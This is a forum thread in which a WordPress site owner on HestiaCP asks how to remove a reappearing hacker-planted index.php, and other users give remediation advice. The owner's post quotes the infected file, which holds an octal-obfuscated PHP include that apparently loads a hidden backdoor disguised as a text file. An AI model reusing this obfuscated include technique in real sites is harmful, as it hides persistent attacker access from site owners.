Unable To Delete A .Php File

Hello good day, Few days ago I experience an attack on my website… I was able to Retrieve it by deleting the code that was inserted in the.htacess

the main issue I was facing is that there is an index.php file the hacker uploaded…been trying to delete it but it kept on coming back… I think he has changed the permission to read Only… Someone should help with a solution. Thanks

Below is the code in the Index.php file

<?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?> <?php define( 'WP_USE_THEMES', true ); require __DIR__ . '/wp-blog-header.php';

Mostlikely some where else some function in a other files that update the index.php every x minutes / hours

If it is Wordpress:

Install wordfence and run it

1 Like

Thanks, I’m using Wordfence already, but the file refuse to delete

delete only would probaly be not enough, you need to find out where it came from.

Use ssh and root, so you’ll be able to remove every file.

There are more infected files.

Reinstall wordpress, themes and all the plugins

Then change permissions of all PHP files to 400 and wait to see if it reinfects.

Check the database too for new admin users.

Thanks for the swift response, Don’t Know how to login via SSH

Give me hint on how to check the database for new admin user

Then you should clearly not use hestia… With hestia, you run a webserver ok your own, this is not the same like a webhosting, it needs knowledge - which how to use ssh is the first one needed. We can’t provide support for such cases according to Please read this, before you start!.

You should consider to get help from a sysadmin.

1 Like

I understand you… When I tried to login via SSH it says access denied

I was able to solve the issue. Thanks

Please, how did you resolve the issue?

Try this first.

Try resetting your root user password

Don’t forget to reset your root password but remember.

If someone got in and has your root password you should reinstall the os and start over again.

It is more likely that the hacker has found a vulnerable wordpress plugin and that he has limited access to your system.

Besides changing passwords, you have to CLEAN the infection and PATCH the entrance so you can’t be hacked again tomorrow by the same guy.

That’s why I am saying that it is important to reinstall wordpress, themes and plugins and to write-protect all PHP files and see if you get infected again.

Yes thanks… Same issue happens off recent… I’m trying to setup a new HestiaCP where I can have the admin access… But I need help on how to make sure my files & database are moved to the new panel… So I can be safe from the hacker.

Since you don’t know how he gets in, how would things be different this time?

Yo will make a clean install, make a new WordPress, install the same vulnerable plugins and have the same hole and then you will be hacked again and again.

First you have to know how the hacker gets in, then you patch and clean and then you consider reinstalling your os.

Unless you are going to patch again.

Don’t take a backup of an infected website to restore it again since you will be backuping the backdoors too.

Thanks… The developer that help me migrate has the admin hestiaCP access… He should be behind the attack that’s my I need to create my own hestiacp from scratch. So I need what to do to make my files safe…

I think it is easier to make a new install and don’t megrate anything.

  • If it is an unknown hacker you would be bringing his back doors with you.
  • If it is the guy that helped you with the migration, what makes you think that he hasn’t a backdoor that you won’t be moving with the backup?

I’m just confused… Won’t making a new installation make me loss all my files?

That’s why you backup them first… But please be informed, that hestia isnt a replacement for sysadmin knowledge and we can’t provide support due to the lack of it - this isnt the idea behind this forum or hestia itself.